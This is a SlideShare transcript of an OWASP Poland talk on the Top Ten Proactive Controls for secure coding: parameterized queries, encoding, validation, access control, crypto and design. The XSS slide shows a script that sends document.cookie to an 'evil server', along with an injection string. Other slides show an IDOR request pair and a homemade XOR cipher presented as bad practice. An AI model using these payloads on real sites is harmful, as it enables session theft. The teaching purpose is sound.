SlideShare a Scribd company logo

Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls

Download as PPTX, PDF
SecuRing
SecuRing

The document outlines the OWASP Top Ten Proactive Controls for secure coding, emphasizing the importance of practices like parameterized queries, data encoding, input validation, and implementing access control. It highlights a lack of security education in many companies and stresses that each application has its own unique risk profile. The document aims to provide essential guidelines for developers to enhance software security through proper design and coding practices.

Software
1 of 52
Downloaded 73 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
Ten Commandments of Secure Coding OWASP Top Ten Proactive Controls Mateusz Olejarka OWASP Poland
Mateusz Olejarka @molejarka • Senior IT Security Consultant @SecuRing • Ex-developer • OWASP Poland since 2011
OWASP O = Open • Docs & tools – free – Creative Commons license – open source • Build with open collaboration in mind – Each one of you can join 3
OWASP Poland Chapter • Since 2007 • Meetings: Kraków, Poznań, Warszawa • Free entry • Supporters:
4Developers 2014* questionnaire * SecuRing’s study „Praktyki wytwarzania bezpiecznego oprogramowania w polskich firmach – 2014” • 62% companies do not educate programmers on application security • >50% companies do not consider security during the design stage • 73% participants confirmed, that they fixed security related issues • only 42% confirmed, that they do security testing before production deployment
OWASP Top10 Risk vs OWASP Top10 Proactive Controls
Disclaimer • Do not rely your application security on Top 10 * – It is purely educational material – Each application has its own risk profile
Thou shalt parametrize queries 1: Parametrize queries
SQL/LDAP/XML/cmd/…-injection Easily exploitable • Simple to use tools exist Devastating impact Źródło: http://xkcd.com/327/
Best practices #1 Prepared Statements / Parametrized Queries #2 Stored Procedures – Watch for exeptions! (eval,dynamic block, etc.) #3 Escaping – risky! String newName = request.getParameter("newName"); String id = request.getParameter("id"); PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id);
References • Bobby Tables: A guide to preventing SQL injection • Query Parameterization Cheat Sheet • SQL Injection Prevention Cheat Sheet • OWASP Secure Coding Practices Quick Reference Guide
2: Thou shalt encode data 2: Encode Data
XSS • Site defacement • Session hijacking <script>document.body.innerHTML(“Jim was here”);</script> <script> var img = new Image(); img.src="http://<some evil server>.com?” + document.cookie; </script>
Results of missing encoding • Session hijacking • Network scanning • CSRF prevention bypass • Site defacement (browser) • … • Browser hijack – vide BeEF
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Cross Site Scripting But when we write output inside pure JavaScript: <script> var split='<bean:write name="transferFormId" property="trn_recipient">'; splitRecipient(split); </script> trn_recipient=';alert('xss');-- <script> var split='';alert('xss');--
Best practices • Special character encoding has to be context aware – HTML element – HTML attribute – JavaScript – JSON – CSS / style – URL
References • XSS (Cross Site Scripting) Prevention Cheat Sheet • Java Encoder Project • Microsoft .NET AntiXSS Library • OWASP ESAPI • Encoder Comparison Reference Project
Thou shalt validate all inputs 3: Validate All Inputs
Why validate anything? • Most of other vulnerabilities (np. injections, xss, …) occurs (also) from missing input validation • Validation it is like firewall – Do not protects you agains everything – …but nice to have
Best practices • Prefer whitelist over blacklist approach, • Use strongly typed fields – One validator per one data type – Easier to integrate a WAF • Validation = first line of defence – For exaple type casting prevents injection – But not the only one!
References • Input Validation Cheat Sheet • Apache Commons Validator • OWASP JSON Sanitizer Project • OWASP Java HTML Sanitizer Project • Google Caja
Thou shalt implement appropriate access controls 4: Implement Appropriate Access Controls
Account history
HTTP request GET /services/history/account/85101022350445200448009906 HTTP/1.1 SA-DeviceId: 940109f08ba56a89 SA-SessionId: 826175 Accept: application/json Host: acc Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) GET /services/history/account/45101022350445200448005388 HTTP/1.1 SA-DeviceId: 940109f08ba56a89 SA-SessionId: 826175 Accept: application/json Host: acc Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) Account id change – we get other user data
Best practices • Server makes a final call! • Default deny • All request must go through access controll – centralized, easy to use mechanism • Access control rules (policy) should be separated from code – Not a part of it
if (currentUser.hasRole(“administrator”)) { //pozwol } else { //zabron } If (currentUser.isPermitted(printPermission)) { //pozwol } else { //zabron }
References • Access Control Cheat Sheet • Java Authorization Guide with Apache Shiro – Apache Shiro Authorization features • OWASP PHPRBAC Project
Thou shalt establish identity and authentication controls 5: Establish Identity and Authentication Controls
Example vulnerability • Authentication with locally stored key (on the machine) • Process: 1. Enter login 2. Select key file,enter key password 3. We are logged in https://...../GenerateNewKey
Best practices • Check access control for the functions allowing to change authentication credentials • „chain of trust” rule • Watch for session at the border! • Do not limit length and characters to use in password
References • Authentication Cheat Sheet • Password Storage Cheat Sheet • Forgot Password Cheat Sheet • Session Management Cheat Sheet
Thou shalt protect data and privacy 6: Protect Data and Privacy
Example (at transit) • SSL covers encryption and authentication • What verifies servers identity? – Web applications: Browser – Mobile / thick-client / embedded… application: Application • Common errors – Missing certificate validation – Brak sprawdzenia certyfikatu lub „łańcucha zaufania” – Missing exception handling
Best practices (in transit) • TLS • For whole application • Cookies: „Secure” flag • HTTP Strict Transport Security • Strong cipher suites • Chain of trust • Certificate pinning
References (in transit) • Transport Layer Protection Cheat Sheet • Pinning Cheat Sheet • OWASP O-Saft (SSL Audit for Testers)
Example (at rest) • Storing password • „Own” SHA1 function public static String encrypt(byte [] in) { String out = ""; for(int i = 0; i < in.length; i++) { byte b = (byte)(in[i] ^ key[i%key.length]); out += "" + hexDigit[(b & 0xf0)>>4] + hexDigit[b & 0x0f]; } return out; }
Best practices(at rest) • Do not reinwent the wheel! – Home-bred ciphers are evil – Own crypto is evil – Only libraries with reputation! • Strong ciphers in strong modes – ECB is evil – CBC – watch for „padding oracle” • Good RNG for IV
References • Google KeyCzar • Cryptographic Storage Cheat Sheet • Password Storage Cheat Sheet
Thou shalt implement logging, error handling and intrusion detection 7: Implement Logging, Error Handling and Intrusion Detection
References • Logging Cheat Sheet • OWASP AppSensor Project
Thou shalt leverage security features of frameworks and security libraries 8: Leverage Security Features of Frameworks and Security Libraries
Refenences • PHP Security Cheat Sheet • .NET Security Cheat Sheet • Spring Security • Apache Shiro • OWASP Dependency Check / Track
Thou shalt include security- specific requirements 9: Include Security-Specific Requirements
Building requirements • Attack scenatios – How threats can reach the objectives? – Requires experience and expertise • Selection of security controls == REQUIREMENTS Threat Results Attack scenarios Who? How? What?
References • OWASP Application Security Verification Standard Project • Software Assurance Maturity Model • Business Logic Security Cheat Sheet • Testing for business logic (OWASP-BL-001)
Thou shalt design and architect security in 10: Design and Architect Security In
References • Software Assurance Maturity Model (OpenSAMM) • Application Security Verification Standard Project • Application Security Architecture Cheat Sheet • Attack Surface Analysis Cheat Sheet • Threat Modeling Cheat Sheet
Summary
That was just the Top Ten! • Each application is different – Risk profile should be defined (WHO? WHY?) – Consider „compliance with existing regulations” • Few easy steps with big positive impact • Developers education is worth it!
OWASP meetings • https://www.owasp.org/index.php/Poland • Mailing list • Facebook: OWASP Poland Local Chapter • Twitter: @owasppoland
Thank you! Mateusz Olejarka @molejarka mateusz.olejarka@owasp.org

More Related Content

What's hot (20)

PPTX
OWASP Top 10 Proactive Controls
Katy Anton
 
PPTX
Secure Coding 101 - OWASP University of Ottawa Workshop
Paul Ionescu
 
PPT
Top Ten Proactive Web Security Controls v5
Jim Manico
 
PPTX
Security Code Review 101
Paul Ionescu
 
PPTX
Top Ten Java Defense for Web Applications v2
Jim Manico
 
PPTX
Java Secure Coding Practices
OWASPKerala
 
PPT
Top Ten Web Application Defenses v12
Jim Manico
 
PDF
Secure Coding principles by example: Build Security In from the start - Carlo...
Codemotion
 
PPTX
Ten Commandments of Secure Coding
Mateusz Olejarka
 
PPTX
Cross Site Scripting (XSS) Defense with Java
Jim Manico
 
PPTX
Owasp Top 10 - A1 Injection
Paul Ionescu
 
PPT
L27
NathannyabvureMapisa
 
PDF
Neoito — Secure coding practices
Neoito
 
PDF
Web Application Firewall: Suckseed or Succeed
Prathan Phongthiproek
 
ODP
OWASP Secure Coding
bilcorry
 
PDF
HackFest 2015 - Rasp vs waf
IMMUNIO
 
PPTX
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
PPTX
Access Control Pitfalls v2
Jim Manico
 
PPTX
Secure Programming In Php
Akash Mahajan
 
PDF
Beyond OWASP Top 10 - TASK October 2017
Aaron Hnatiw
 
OWASP Top 10 Proactive Controls
Katy Anton
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Paul Ionescu
 
Top Ten Proactive Web Security Controls v5
Jim Manico
 
Security Code Review 101
Paul Ionescu
 
Top Ten Java Defense for Web Applications v2
Jim Manico
 
Java Secure Coding Practices
OWASPKerala
 
Top Ten Web Application Defenses v12
Jim Manico
 
Secure Coding principles by example: Build Security In from the start - Carlo...
Codemotion
 
Ten Commandments of Secure Coding
Mateusz Olejarka
 
Cross Site Scripting (XSS) Defense with Java
Jim Manico
 
Owasp Top 10 - A1 Injection
Paul Ionescu
 
L27
NathannyabvureMapisa
 
Neoito — Secure coding practices
Neoito
 
Web Application Firewall: Suckseed or Succeed
Prathan Phongthiproek
 
OWASP Secure Coding
bilcorry
 
HackFest 2015 - Rasp vs waf
IMMUNIO
 
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
Access Control Pitfalls v2
Jim Manico
 
Secure Programming In Php
Akash Mahajan
 
Beyond OWASP Top 10 - TASK October 2017
Aaron Hnatiw
 

Viewers also liked (20)

PPTX
AppSec EU 2015 - E-banking transaction authorization - possible vulnerabiliti...
SecuRing
 
PDF
Rapid Threat Modeling Techniques
Priyanka Aash
 
PPT
Understanding the Regulatory Evolution of Mobile Commerce and the Opportun...
Arief Gunawan
 
PPTX
Owasp Proactive Controls for Web developer
Sameer Paradia
 
PPTX
Zagrożenia dla aplikacji bankowych i sposoby zmniejszania ryzyka
SecuRing
 
PDF
Robert Hurlbut - Threat Modeling for Secure Software Design
centralohioissa
 
PPTX
Modelowanie zagrożeń - Na przykladzie platności mobilnych
SecuRing
 
PPTX
ICT security and Open Data
SecuRing
 
PDF
Legacy-SecDevOps (AppSec Management Debrief)
Dinis Cruz
 
ODP
Building an Open Source AppSec Pipeline
Matt Tesauro
 
PDF
AppSec Pipelines and Event based Security
Matt Tesauro
 
PDF
AppSec is Eating Security
Alex Stamos
 
PPTX
009 sql server management studio
let's go to study
 
PPTX
ASP.NET Core deployment options
Ken Cenerelli
 
PPTX
Javascript and Jquery: The connection between
Clint LaForest
 
PPTX
OOPs fundamentals session for freshers in my office (Aug 5, 13)
Ashoka R K T
 
PPTX
Sql server 2012 ha dr
Joseph D'Antoni
 
PPTX
Back to the Basics - 1 - Introduction to Web Development
Clint LaForest
 
PPTX
.Net framework architecture
Fad Zulkifli
 
PDF
Threat Modeling web applications (2012 update)
Antonio Fontes
 
AppSec EU 2015 - E-banking transaction authorization - possible vulnerabiliti...
SecuRing
 
Rapid Threat Modeling Techniques
Priyanka Aash
 
Understanding the Regulatory Evolution of Mobile Commerce and the Opportun...
Arief Gunawan
 
Owasp Proactive Controls for Web developer
Sameer Paradia
 
Zagrożenia dla aplikacji bankowych i sposoby zmniejszania ryzyka
SecuRing
 
Robert Hurlbut - Threat Modeling for Secure Software Design
centralohioissa
 
Modelowanie zagrożeń - Na przykladzie platności mobilnych
SecuRing
 
ICT security and Open Data
SecuRing
 
Legacy-SecDevOps (AppSec Management Debrief)
Dinis Cruz
 
Building an Open Source AppSec Pipeline
Matt Tesauro
 
AppSec Pipelines and Event based Security
Matt Tesauro
 
AppSec is Eating Security
Alex Stamos
 
009 sql server management studio
let's go to study
 
ASP.NET Core deployment options
Ken Cenerelli
 
Javascript and Jquery: The connection between
Clint LaForest
 
OOPs fundamentals session for freshers in my office (Aug 5, 13)
Ashoka R K T
 
Sql server 2012 ha dr
Joseph D'Antoni
 
Back to the Basics - 1 - Introduction to Web Development
Clint LaForest
 
.Net framework architecture
Fad Zulkifli
 
Threat Modeling web applications (2012 update)
Antonio Fontes
 
Ad

Similar to Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls (20)

PPTX
Spa Secure Coding Guide
Geoffrey Vandiest
 
PDF
we45 DEFCON Workshop - Building AppSec Automation with Python
Abhay Bhargav
 
PDF
AppSec in an Agile World
David Lindner
 
PPTX
The OWASP Zed Attack Proxy
Aditya Gupta
 
PPTX
Alexey Sintsov- SDLC - try me to implement
DefconRussia
 
PDF
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
Philippe Gamache
 
PDF
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
Philippe Gamache
 
PPTX
security misconfigurations
Megha Sahu
 
PPTX
Software Development in the Age of Breaches
Karthik Bhat
 
PDF
stackconf 2024 | How to hack and defend (your) open source by Roman Zhukov.pdf
NETWAYS
 
PPTX
Owasp top10salesforce
gbreavin
 
PPTX
Vulnerabilities in modern web applications
Niyas Nazar
 
PPTX
Java application security the hard way - a workshop for the serious developer
Steve Poole
 
PPT
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
Brian Huff
 
PPTX
Securing your web apps now
Stephan Steynfaardt
 
PPTX
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
PDF
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Denim Group
 
PDF
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
PDF
OWASP Top 10 Web Vulnerabilities from DCC 04/14
Chris Holwerda
 
PDF
SecurityBSides London - Agnitio: it's static analysis but not as we know it
Security Ninja
 
Spa Secure Coding Guide
Geoffrey Vandiest
 
we45 DEFCON Workshop - Building AppSec Automation with Python
Abhay Bhargav
 
AppSec in an Agile World
David Lindner
 
The OWASP Zed Attack Proxy
Aditya Gupta
 
Alexey Sintsov- SDLC - try me to implement
DefconRussia
 
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
Philippe Gamache
 
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
Philippe Gamache
 
security misconfigurations
Megha Sahu
 
Software Development in the Age of Breaches
Karthik Bhat
 
stackconf 2024 | How to hack and defend (your) open source by Roman Zhukov.pdf
NETWAYS
 
Owasp top10salesforce
gbreavin
 
Vulnerabilities in modern web applications
Niyas Nazar
 
Java application security the hard way - a workshop for the serious developer
Steve Poole
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
Brian Huff
 
Securing your web apps now
Stephan Steynfaardt
 
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Denim Group
 
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
OWASP Top 10 Web Vulnerabilities from DCC 04/14
Chris Holwerda
 
SecurityBSides London - Agnitio: it's static analysis but not as we know it
Security Ninja
 
Ad

More from SecuRing (20)

PDF
Developer in a digital crosshair, 2023 edition - 4Developers
SecuRing
 
PDF
Developer in a digital crosshair, 2022 edition - Oh My H@ck!
SecuRing
 
PDF
Developer in a digital crosshair, 2022 edition - No cON Name
SecuRing
 
PPTX
Is persistency on serverless even possible?!
SecuRing
 
PDF
What happens on your Mac, stays on Apple’s iCloud?!
SecuRing
 
PDF
0-Day Up Your Sleeve - Attacking macOS Environments
SecuRing
 
PDF
Developer in a digital crosshair, 2022 edition
SecuRing
 
PDF
20+ Ways To Bypass Your Macos Privacy Mechanisms
SecuRing
 
PDF
How secure are webinar platforms?
SecuRing
 
PDF
20+ Ways to Bypass Your macOS Privacy Mechanisms
SecuRing
 
PDF
Serverless security: attack & defense
SecuRing
 
PDF
Abusing & Securing XPC in macOS apps
SecuRing
 
PDF
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
SecuRing
 
PDF
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
SecuRing
 
PDF
Let's get evil - threat modeling at scale
SecuRing
 
PDF
Attacking AWS: the full cyber kill chain
SecuRing
 
PDF
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
SecuRing
 
PDF
Budowanie i hakowanie nowoczesnych aplikacji iOS
SecuRing
 
PDF
We need t go deeper - Testing inception apps.
SecuRing
 
PDF
Building & Hacking Modern iOS Apps
SecuRing
 
Developer in a digital crosshair, 2023 edition - 4Developers
SecuRing
 
Developer in a digital crosshair, 2022 edition - Oh My H@ck!
SecuRing
 
Developer in a digital crosshair, 2022 edition - No cON Name
SecuRing
 
Is persistency on serverless even possible?!
SecuRing
 
What happens on your Mac, stays on Apple’s iCloud?!
SecuRing
 
0-Day Up Your Sleeve - Attacking macOS Environments
SecuRing
 
Developer in a digital crosshair, 2022 edition
SecuRing
 
20+ Ways To Bypass Your Macos Privacy Mechanisms
SecuRing
 
How secure are webinar platforms?
SecuRing
 
20+ Ways to Bypass Your macOS Privacy Mechanisms
SecuRing
 
Serverless security: attack & defense
SecuRing
 
Abusing & Securing XPC in macOS apps
SecuRing
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
SecuRing
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
SecuRing
 
Let's get evil - threat modeling at scale
SecuRing
 
Attacking AWS: the full cyber kill chain
SecuRing
 
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
SecuRing
 
Budowanie i hakowanie nowoczesnych aplikacji iOS
SecuRing
 
We need t go deeper - Testing inception apps.
SecuRing
 
Building & Hacking Modern iOS Apps
SecuRing
 

Recently uploaded (20)

PPTX
iaas vs paas vs saas :choosing your cloud strategy
CloudlayaTechnology
 
PDF
Download Canva Pro 2025 PC Crack Full Latest Version
bashirkhan333g
 
PDF
Why is partnering with a SaaS development company crucial for enterprise succ...
Nextbrain Technologies
 
PDF
ERP Consulting Services and Solutions by Contetra Pvt Ltd
jayjani123
 
PPTX
Get Started with Maestro: Agent, Robot, and Human in Action – Session 5 of 5
klpathrudu
 
PDF
UITP Summit Meep Pitch may 2025 MaaS Rebooted
campoamor1
 
PDF
Dipole Tech Innovations – Global IT Solutions for Business Growth
dipoletechi3
 
PPTX
BB FlashBack Pro 5.61.0.4843 With Crack Free Download
cracked shares
 
PDF
Everything you need to know about pricing & licensing Microsoft 365 Copilot f...
Q-Advise
 
PDF
TheFutureIsDynamic-BoxLang witch Luis Majano.pdf
Ortus Solutions, Corp
 
PPTX
prodad heroglyph crack 2.0.214.2 Full Free Download
cracked shares
 
PDF
SAP Firmaya İade ABAB Kodları - ABAB ile yazılmıl hazır kod örneği
Salih Küçük
 
PDF
intro_to_cpp_namespace_robotics_corner.pdf
MohamedSaied877003
 
PPTX
UI5con_2025_Accessibility_Ever_Evolving_
gerganakremenska1
 
PDF
4K Video Downloader Plus Pro Crack for MacOS New Download 2025
bashirkhan333g
 
PDF
Ready Layer One: Intro to the Model Context Protocol
mmckenna1
 
PPTX
From spreadsheets and delays to real-time control
SatishKumar2651
 
PDF
Technical-Careers-Roadmap-in-Software-Market.pdf
Hussein Ali
 
PDF
[Solution] Why Choose the VeryPDF DRM Protector Custom-Built Solution for You...
Lingwen1998
 
PPTX
Comprehensive Risk Assessment Module for Smarter Risk Management
EHA Soft Solutions
 
iaas vs paas vs saas :choosing your cloud strategy
CloudlayaTechnology
 
Download Canva Pro 2025 PC Crack Full Latest Version
bashirkhan333g
 
Why is partnering with a SaaS development company crucial for enterprise succ...
Nextbrain Technologies
 
ERP Consulting Services and Solutions by Contetra Pvt Ltd
jayjani123
 
Get Started with Maestro: Agent, Robot, and Human in Action – Session 5 of 5
klpathrudu
 
UITP Summit Meep Pitch may 2025 MaaS Rebooted
campoamor1
 
Dipole Tech Innovations – Global IT Solutions for Business Growth
dipoletechi3
 
BB FlashBack Pro 5.61.0.4843 With Crack Free Download
cracked shares
 
Everything you need to know about pricing & licensing Microsoft 365 Copilot f...
Q-Advise
 
TheFutureIsDynamic-BoxLang witch Luis Majano.pdf
Ortus Solutions, Corp
 
prodad heroglyph crack 2.0.214.2 Full Free Download
cracked shares
 
SAP Firmaya İade ABAB Kodları - ABAB ile yazılmıl hazır kod örneği
Salih Küçük
 
intro_to_cpp_namespace_robotics_corner.pdf
MohamedSaied877003
 
UI5con_2025_Accessibility_Ever_Evolving_
gerganakremenska1
 
4K Video Downloader Plus Pro Crack for MacOS New Download 2025
bashirkhan333g
 
Ready Layer One: Intro to the Model Context Protocol
mmckenna1
 
From spreadsheets and delays to real-time control
SatishKumar2651
 
Technical-Careers-Roadmap-in-Software-Market.pdf
Hussein Ali
 
[Solution] Why Choose the VeryPDF DRM Protector Custom-Built Solution for You...
Lingwen1998
 
Comprehensive Risk Assessment Module for Smarter Risk Management
EHA Soft Solutions
 

Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls

  • 1. Ten Commandments of Secure Coding OWASP Top Ten Proactive Controls Mateusz Olejarka OWASP Poland
  • 2. Mateusz Olejarka @molejarka • Senior IT Security Consultant @SecuRing • Ex-developer • OWASP Poland since 2011
  • 3. OWASP O = Open • Docs & tools – free – Creative Commons license – open source • Build with open collaboration in mind – Each one of you can join 3
  • 4. OWASP Poland Chapter • Since 2007 • Meetings: Kraków, Poznań, Warszawa • Free entry • Supporters:
  • 5. 4Developers 2014* questionnaire * SecuRing’s study „Praktyki wytwarzania bezpiecznego oprogramowania w polskich firmach – 2014” • 62% companies do not educate programmers on application security • >50% companies do not consider security during the design stage • 73% participants confirmed, that they fixed security related issues • only 42% confirmed, that they do security testing before production deployment
  • 6. OWASP Top10 Risk vs OWASP Top10 Proactive Controls
  • 7. Disclaimer • Do not rely your application security on Top 10 * – It is purely educational material – Each application has its own risk profile
  • 8. Thou shalt parametrize queries 1: Parametrize queries
  • 9. SQL/LDAP/XML/cmd/…-injection Easily exploitable • Simple to use tools exist Devastating impact Źródło: http://xkcd.com/327/
  • 10. Best practices #1 Prepared Statements / Parametrized Queries #2 Stored Procedures – Watch for exeptions! (eval,dynamic block, etc.) #3 Escaping – risky! String newName = request.getParameter("newName"); String id = request.getParameter("id"); PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id);
  • 11. References • Bobby Tables: A guide to preventing SQL injection • Query Parameterization Cheat Sheet • SQL Injection Prevention Cheat Sheet • OWASP Secure Coding Practices Quick Reference Guide
  • 12. 2: Thou shalt encode data 2: Encode Data
  • 13. XSS • Site defacement • Session hijacking <script>document.body.innerHTML(“Jim was here”);</script> <script> var img = new Image(); img.src="http://<some evil server>.com?” + document.cookie; </script>
  • 14. Results of missing encoding • Session hijacking • Network scanning • CSRF prevention bypass • Site defacement (browser) • … • Browser hijack – vide BeEF
  • 16. Cross Site Scripting But when we write output inside pure JavaScript: <script> var split='<bean:write name="transferFormId" property="trn_recipient">'; splitRecipient(split); </script> trn_recipient=';alert('xss');-- <script> var split='';alert('xss');--
  • 17. Best practices • Special character encoding has to be context aware – HTML element – HTML attribute – JavaScript – JSON – CSS / style – URL
  • 18. References • XSS (Cross Site Scripting) Prevention Cheat Sheet • Java Encoder Project • Microsoft .NET AntiXSS Library • OWASP ESAPI • Encoder Comparison Reference Project
  • 19. Thou shalt validate all inputs 3: Validate All Inputs
  • 20. Why validate anything? • Most of other vulnerabilities (np. injections, xss, …) occurs (also) from missing input validation • Validation it is like firewall – Do not protects you agains everything – …but nice to have
  • 21. Best practices • Prefer whitelist over blacklist approach, • Use strongly typed fields – One validator per one data type – Easier to integrate a WAF • Validation = first line of defence – For exaple type casting prevents injection – But not the only one!
  • 22. References • Input Validation Cheat Sheet • Apache Commons Validator • OWASP JSON Sanitizer Project • OWASP Java HTML Sanitizer Project • Google Caja
  • 23. Thou shalt implement appropriate access controls 4: Implement Appropriate Access Controls
  • 25. HTTP request GET /services/history/account/85101022350445200448009906 HTTP/1.1 SA-DeviceId: 940109f08ba56a89 SA-SessionId: 826175 Accept: application/json Host: acc Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) GET /services/history/account/45101022350445200448005388 HTTP/1.1 SA-DeviceId: 940109f08ba56a89 SA-SessionId: 826175 Accept: application/json Host: acc Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) Account id change – we get other user data
  • 26. Best practices • Server makes a final call! • Default deny • All request must go through access controll – centralized, easy to use mechanism • Access control rules (policy) should be separated from code – Not a part of it
  • 27. if (currentUser.hasRole(“administrator”)) { //pozwol } else { //zabron } If (currentUser.isPermitted(printPermission)) { //pozwol } else { //zabron }
  • 28. References • Access Control Cheat Sheet • Java Authorization Guide with Apache Shiro – Apache Shiro Authorization features • OWASP PHPRBAC Project
  • 29. Thou shalt establish identity and authentication controls 5: Establish Identity and Authentication Controls
  • 30. Example vulnerability • Authentication with locally stored key (on the machine) • Process: 1. Enter login 2. Select key file,enter key password 3. We are logged in https://...../GenerateNewKey
  • 31. Best practices • Check access control for the functions allowing to change authentication credentials • „chain of trust” rule • Watch for session at the border! • Do not limit length and characters to use in password
  • 32. References • Authentication Cheat Sheet • Password Storage Cheat Sheet • Forgot Password Cheat Sheet • Session Management Cheat Sheet
  • 33. Thou shalt protect data and privacy 6: Protect Data and Privacy
  • 34. Example (at transit) • SSL covers encryption and authentication • What verifies servers identity? – Web applications: Browser – Mobile / thick-client / embedded… application: Application • Common errors – Missing certificate validation – Brak sprawdzenia certyfikatu lub „łańcucha zaufania” – Missing exception handling
  • 35. Best practices (in transit) • TLS • For whole application • Cookies: „Secure” flag • HTTP Strict Transport Security • Strong cipher suites • Chain of trust • Certificate pinning
  • 36. References (in transit) • Transport Layer Protection Cheat Sheet • Pinning Cheat Sheet • OWASP O-Saft (SSL Audit for Testers)
  • 37. Example (at rest) • Storing password • „Own” SHA1 function public static String encrypt(byte [] in) { String out = ""; for(int i = 0; i < in.length; i++) { byte b = (byte)(in[i] ^ key[i%key.length]); out += "" + hexDigit[(b & 0xf0)>>4] + hexDigit[b & 0x0f]; } return out; }
  • 38. Best practices(at rest) • Do not reinwent the wheel! – Home-bred ciphers are evil – Own crypto is evil – Only libraries with reputation! • Strong ciphers in strong modes – ECB is evil – CBC – watch for „padding oracle” • Good RNG for IV
  • 39. References • Google KeyCzar • Cryptographic Storage Cheat Sheet • Password Storage Cheat Sheet
  • 40. Thou shalt implement logging, error handling and intrusion detection 7: Implement Logging, Error Handling and Intrusion Detection
  • 41. References • Logging Cheat Sheet • OWASP AppSensor Project
  • 42. Thou shalt leverage security features of frameworks and security libraries 8: Leverage Security Features of Frameworks and Security Libraries
  • 43. Refenences • PHP Security Cheat Sheet • .NET Security Cheat Sheet • Spring Security • Apache Shiro • OWASP Dependency Check / Track
  • 44. Thou shalt include security- specific requirements 9: Include Security-Specific Requirements
  • 45. Building requirements • Attack scenatios – How threats can reach the objectives? – Requires experience and expertise • Selection of security controls == REQUIREMENTS Threat Results Attack scenarios Who? How? What?
  • 46. References • OWASP Application Security Verification Standard Project • Software Assurance Maturity Model • Business Logic Security Cheat Sheet • Testing for business logic (OWASP-BL-001)
  • 47. Thou shalt design and architect security in 10: Design and Architect Security In
  • 48. References • Software Assurance Maturity Model (OpenSAMM) • Application Security Verification Standard Project • Application Security Architecture Cheat Sheet • Attack Surface Analysis Cheat Sheet • Threat Modeling Cheat Sheet
  • 50. That was just the Top Ten! • Each application is different – Risk profile should be defined (WHO? WHY?) – Consider „compliance with existing regulations” • Few easy steps with big positive impact • Developers education is worth it!
  • 51. OWASP meetings • https://www.owasp.org/index.php/Poland • Mailing list • Facebook: OWASP Poland Local Chapter • Twitter: @owasppoland